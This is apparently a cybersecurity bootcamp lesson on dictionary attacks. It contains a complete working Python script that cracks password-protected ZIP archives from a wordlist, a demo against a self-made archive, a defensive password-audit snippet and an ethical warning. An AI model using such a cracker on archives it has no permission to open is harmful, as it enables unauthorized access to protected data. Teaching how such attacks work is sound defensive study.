Week 2 Session 3 Task: Dissecting How Brute Force Works with Python

The attack we will perform is an offline dictionary attack.

  • Offline means that once we have the encrypted ZIP file, we no longer need to interact with a network or the original target. The entire guessing process happens locally on our own machine.
  • Dictionary attack means we won't try every possible combination of characters (which could take millions of years). Instead, we'll try every password from a pre-compiled list, also known as a "dictionary" or wordlist.

Steps:

  1. Prepare a Wordlist: Create a text file (e.g., wordlist.txt) containing common or suspected passwords.
  2. Try Each Password: The script will read the dictionary file line by line.
  3. Test the Lock: For each password, the script will attempt to extract the contents of the ZIP file using that password.

The Code: Dissecting zip_cracker.py

This is the core engine of our tool. Here's the complete code:

# zip_cracker.py
import zipfile
import sys
from tqdm import tqdm

def crack_zip_password(zip_file_path, wordlist_path):
    try:
        zip_file = zipfile.ZipFile(zip_file_path)
        with open(wordlist_path, "r", errors="ignore") as f:
            passwords = f.readlines()
    except FileNotFoundError:
        print(f"[!] Error: File '{zip_file_path}' or '{wordlist_path}' not found.")
        return
    except zipfile.BadZipFile:
        print(f"[!] Error: File '{zip_file_path}' is not a valid ZIP file.")
        return

    print(f"\n[+] Starting brute force attack on: {zip_file_path}")

    found_password = None
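    for password in tqdm(passwords, desc="Trying Passwords"):
        # Drop the trailing newline left by readlines()
        password = password.strip()
        try:
            # zipfile expects the password as bytes
            zip_file.extractall(pwd=password.encode('utf-8'))
            found_password = password
            break
        except RuntimeError as e:
            # zipfile raises RuntimeError("Bad password for file ...") on a wrong guess
            if 'Bad password' in str(e):
                continue
        except Exception:
            # Any other failure (e.g. a CRC or decompression error) is treated as a wrong guess
            continue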

    zip_file.close()
    print()

    if found_password:
        print("="*45)
        print(f"✅ [SUCCESS] Password Found!")
        print(f"  🔑 Password: {found_password}")
        print("="*45)
    else:
        print("[-] Attack finished. Password not found in your wordlist.")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python zip_cracker.py <zip_file> <wordlist_file>")
        sys.exit(1)

    zip_file = sys.argv[1]
    wordlist = sys.argv[2]
    crack_zip_password(zip_file, wordlist)

Step-by-Step Demonstration

  1. Prepare Your Files: Create a ZIP file (e.g., dokumen rahasia.zip) with the password rahasia123, and make sure the word rahasia123 is inside wordlist.txt.
  2. Install Dependencies: Install tqdm with: pip install tqdm.
  3. Open Your Terminal: Navigate to the folder containing the script and files using cd.
  4. Run the Script: python zip_cracker.py "dokumen rahasia.zip" wordlist.txt

Conclusion & Ethical Considerations

Building a tool like this is a fantastic way to understand how an attack works — and more importantly, how to defend against it. This attack succeeded because the password was weak and predictable.
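A check for the weakness named above, as an added example that is not part of the original post: it rejects a candidate archive password that is in the wordlist, or that is a wordlist entry with only its case or trailing digits and symbols changed. SAMPLE_WORDLIST, MIN_BITS and the function names are assumptions made for this illustration, and the bit figure is an upper bound that treats every character as randomly chosen.

```python
import math
import string

# Constructed sample standing in for wordlist.txt (not a real leaked list).
SAMPLE_WORDLIST = ["123456", "password", "rahasia123", "qwerty", "admin"]
MIN_BITS = 60  # assumed policy threshold for this example, not a standard

def load_wordlist(path):
    """Read a wordlist the way zip_cracker.py does: one candidate per line."""
    with open(path, "r", errors="ignore") as f:
        return [line.strip() for line in f if line.strip()]

def stem(word):
    """Lower-case and drop trailing digits/punctuation: 'Rahasia2024!' -> 'rahasia'."""
    return word.strip().lower().rstrip(string.digits + string.punctuation)

def exhaustive_bits(password):
    """Upper bound on search cost if every character were chosen at random."""
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    alphabet = sum(len(c) for c in classes if any(ch in c for ch in password))
    return round(len(password) * math.log2(alphabet), 1) if alphabet else 0.0

def audit_password(password, wordlist):
    """Classify a candidate archive password against a dictionary attack."""
    words = set(wordlist)
    # Entries made only of digits/symbols stem to "", which would match anything.
    stems = {stem(w) for w in wordlist} - {""}
    bits = exhaustive_bits(password)
    if password in words:
        verdict = "reject: exact wordlist entry"
    elif stem(password) in stems:
        verdict = "reject: variant of a wordlist entry"
    elif bits < MIN_BITS:
        verdict = "reject: too short"
    else:
        verdict = "ok: not in wordlist"
    return {"verdict": verdict, "exhaustive_bits": bits}

if __name__ == "__main__":
    for candidate in ["rahasia123", "Rahasia2024!", "987654",
                      "tiga-Kuda-biru-langit-47"]:
        print(candidate, audit_password(candidate, SAMPLE_WORDLIST))
```

Note that rahasia123 is rejected as an exact wordlist entry even though its naive bit estimate is about 51.7: the character-count figure says nothing once the password appears in a dictionary.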

⚠️ Ethical Warning: This tool is created for educational purposes only. Using it to access files you do not own or have permission to access is illegal and unethical. The key takeaway is: always use long, complex, and unique passwords to stay safe from dictionary attacks.

#IDNBootCampCyber
